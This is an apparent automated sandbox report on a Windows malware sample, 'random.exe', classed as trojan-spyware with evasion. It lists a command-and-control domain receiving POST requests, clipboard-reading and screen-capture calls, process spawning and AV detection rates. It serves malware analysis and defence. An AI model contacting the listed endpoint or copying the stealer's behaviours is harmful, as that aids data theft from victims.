HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click

Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/Z
Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/api
Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiPP
Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiUT
Source: random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/bu
Source: random.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/la
Source: random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/pi
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api)
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/apidfmbI
Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/apik

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437A60

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437A60

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00437C10

Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043D0D0	3_2_0043D0D0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0040E16E	3_2_0040E16E
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00408A60	3_2_00408A60
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004442E0	3_2_004442E0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00421B30	3_2_00421B30
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00418BA2	3_2_00418BA2
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00444C20	3_2_00444C20
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043CE90	3_2_0043CE90
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00428750	3_2_00428750
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00425713	3_2_00425713
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042F716	3_2_0042F716
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00437850	3_2_00437850
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041906A	3_2_0041906A
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00426010	3_2_00426010
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004438E0	3_2_004438E0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004180F0	3_2_004180F0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004438F9	3_2_004438F9
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004438FB	3_2_004438FB
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00427885	3_2_00427885
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041D8B0	3_2_0041D8B0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00406950	3_2_00406950
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00444950	3_2_00444950
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0040D172	3_2_0040D172
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043210B	3_2_0043210B
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00403910	3_2_00403910
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00429917	3_2_00429917
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00406120	3_2_00406120
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0040B92C	3_2_0040B92C
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042F1C1	3_2_0042F1C1
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004239EB	3_2_004239EB
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00421180	3_2_00421180
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041618C	3_2_0041618C
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043099F	3_2_0043099F
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041F9A0	3_2_0041F9A0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041D1B0	3_2_0041D1B0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042E9B0	3_2_0042E9B0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041BA52	3_2_0041BA52
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043025E	3_2_0043025E
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042621B	3_2_0042621B
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042BA20	3_2_0042BA20
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00417222	3_2_00417222
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00443A30	3_2_00443A30
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004042C0	3_2_004042C0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00443AC0	3_2_00443AC0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004302CD	3_2_004302CD
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0040F2D0	3_2_0040F2D0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0040B280	3_2_0040B280
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004352B0	3_2_004352B0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00402B40	3_2_00402B40
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00443B60	3_2_00443B60
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00409B70	3_2_00409B70
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00422370	3_2_00422370
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00429B7B	3_2_00429B7B
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042FB7D	3_2_0042FB7D
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00405B00	3_2_00405B00
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00440B00	3_2_00440B00
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00428B10	3_2_00428B10
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00419B30	3_2_00419B30
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00411BDE	3_2_00411BDE
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004123EC	3_2_004123EC
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00428C62	3_2_00428C62
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043C460	3_2_0043C460
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043B410	3_2_0043B410
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00441C26	3_2_00441C26
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004064C0	3_2_004064C0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042F4E1	3_2_0042F4E1
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004324EE	3_2_004324EE
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041D4A0	3_2_0041D4A0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00408D10	3_2_00408D10
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043E520	3_2_0043E520
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00442DCA	3_2_00442DCA
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00415DD8	3_2_00415DD8
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00425DA0	3_2_00425DA0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004085B0	3_2_004085B0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00409660	3_2_00409660
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00404E20	3_2_00404E20
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043C6C0	3_2_0043C6C0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043E6E0	3_2_0043E6E0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004186E5	3_2_004186E5
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00444680	3_2_00444680
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0041DE90	3_2_0041DE90
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0043DF60	3_2_0043DF60
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00429F7C	3_2_00429F7C
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00433707	3_2_00433707
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00402F10	3_2_00402F10
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00407730	3_2_00407730
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00427FC0	3_2_00427FC0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004437D0	3_2_004437D0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00433FDF	3_2_00433FDF
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004127E0	3_2_004127E0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042A7F0	3_2_0042A7F0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_00434FF0	3_2_00434FF0
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0042AF92	3_2_0042AF92

Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00408280 appears 47 times
Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00414C20 appears 145 times

Source: C:\Users\user\Desktop\random.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140

Source: random.exe, 00000000.00000000.1655196760.0000000000B98000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe
Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe
Source: random.exe, 00000000.00000002.1783439398.000000000117E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs random.exe
Source: random.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: random.exe

Static PE information: Section: .BSS ZLIB complexity 1.0003366411102483

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/1

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043D0D0

Source: C:\Users\user\Desktop\random.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6732

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6e4044c3-0b0f-4d85-b4b8-3e8de7ffdb6e

Jump to behavior

Source: random.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: random.exe	ReversingLabs: Detection: 65%
Source: random.exe	Virustotal: Detection: 76%

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: random.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Handler.pdbxa source: random.exe
Source:	Binary string: System.Windows.Forms.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb(E source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.pdb) source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: random.exe, WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: Handler.pdba source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD1D7.tmp.dmp.6.dr

Source: random.exe

Static PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]

Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_004499A1 push esp; ret		3_2_004499A2
Source: C:\Users\user\Desktop\random.exe	Code function: 3_2_0044AAD0 push ecx; retn 0041h		3_2_0044AAD5

Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
